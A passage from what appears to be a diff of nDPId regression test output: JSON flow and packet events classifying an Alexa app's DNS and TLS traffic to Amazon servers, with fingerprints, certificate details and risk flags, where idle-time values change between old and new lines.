+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1490976093238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976093238,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWltAAEARM1SsECrYrBAqAaKnADUAMOTtwQkBAAABAAAAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAQ=="} 
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1490976093355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976093355,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr3WJAAEARsCWsECoBrBAq2AA1oqcAV3huwQmBgAABAAIAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAIQACwhkcC1ndy1uYcAYwDQAAQABAAAAFAAEsCBlNA=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 00191{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729} 
00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1490976100811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100811,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BwBAAEAGDSusECrYNu8YuoUaAbt\/SWKxAAAAAKAC\/\/9R9gAAAgQFtAQCCAoA9mWxAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100859,"flow_last_seen":1490976100859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100859,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1490976100859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100859,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8OO5AAEAGq6asECrYNudIWKNhAbuICV1bAAAAAKAC\/\/8AqwAAAgQFtAQCCAoA9mW1AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1490976100998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976100998,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw6qtAAOcGgoo27xi6rBAq2AG7hRpDnUSYf0lisnASH\/5McwAAAgQFtAEDAwY="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
